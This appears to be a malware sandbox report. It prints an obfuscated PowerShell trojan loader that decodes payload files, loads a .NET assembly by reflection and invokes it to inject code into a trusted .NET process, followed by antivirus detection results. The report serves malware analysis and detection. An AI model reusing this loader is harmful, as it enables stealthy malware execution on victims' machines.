Static | ZeroBOX
No static analysis available.
Function FH([String] $Jxxxe) {
$JS = [System.Collections.Generic.List[Byte]]::new()
for ($i = 0; $i -lt $Jxxxe.Length; $i +=8) {
$JS.Add([Convert]::ToByte($Jxxxe.Substring($i, 8), 2))
return [System.Text.Encoding]::ASCII.GetString($JS.ToArray())
function VB {
param($Alosh)
$Alosh = $Alosh -split '(..)' | ? { $_ }
ForEach ($JSEYHESSS325 in $Alosh){
[Convert]::ToInt32($JSEYHESSS325,16)
$Jxxxe = (Get-Content -Path "C:\Users\Public\msg.txt" -Raw) -replace "%","0" -replace "!","1" -replace "@","A"
$geGWHZ = (Get-Content -Path "C:\Users\Public\runpe.txt" -Raw) -replace "%","0" -replace "!","1" -replace "@","A"
Sleep 9
$YUS = FH("!^1!^!^!^1!^1!^1111!^!^!^!^11!^!^1!^1!^11!^!^!^11!^111!^1!^1!^111!^1!^!^!^11!^!^1!^1".Replace('!^','0'))
$JSEU = FH("0!^00!^00!^0!^!^0!^!^!^00!^!^!^0!^!^00!^!^0!^!^!^!^0!^!^0!^0!^!^0!^!^00!^0!^".Replace('!^','1'))
$KRDESEY = FH("0100001100111010010111000101011101101001011011100110010001101111011101110111001101011100010011010110100101100011011100100110111101110011011011110110011001110100001011100100111001000101010101000101110001000110011100100110000101101101011001010111011101101111011100100110101101011100011101100011010000101110001100000010111000110011001100000011001100110001001110010101110001100001011100110111000001101110011001010111010001011111011000110110111101101101011100000110100101101100011001010111001000101110011001010111100001100101")
[Byte[]]$JR = VB $Jxxxe
[Byte[]]$jsewty = VB $geGWHZ
$AsseDDDDDmbly = [System.Reflection.Assembly]::Load($jsewty)
$AHDX = FH("010011100110010101110111010100000100010100110010001011100101000001000101")
$AB = $AsseDDDDDmbly.GetType($AHDX)
$KJA = $AB.GetMethod($YUS)
$KES = [object[]]($KRDESEY, $JR)
$KJA.$JSEU.Invoke($null, $KES)
} catch {
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Trojan.PowerShell.Agent
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Clean
BitDefenderTheta Clean
VirIT Clean
Symantec Clean
ESET-NOD32 PowerShell/Agent.BET
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.PowerShell.Kryptik.gen
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Rising Clean
Emsisoft Clean
F-Secure Clean
Baidu Clean
VIPRE Clean
TrendMicro Clean
FireEye Clean
Sophos Clean
Jiangmin Clean
Varist Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Malware@#gjmwe060moew
Microsoft Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Kryptik.gen
GData Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Win32.Outbreak
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.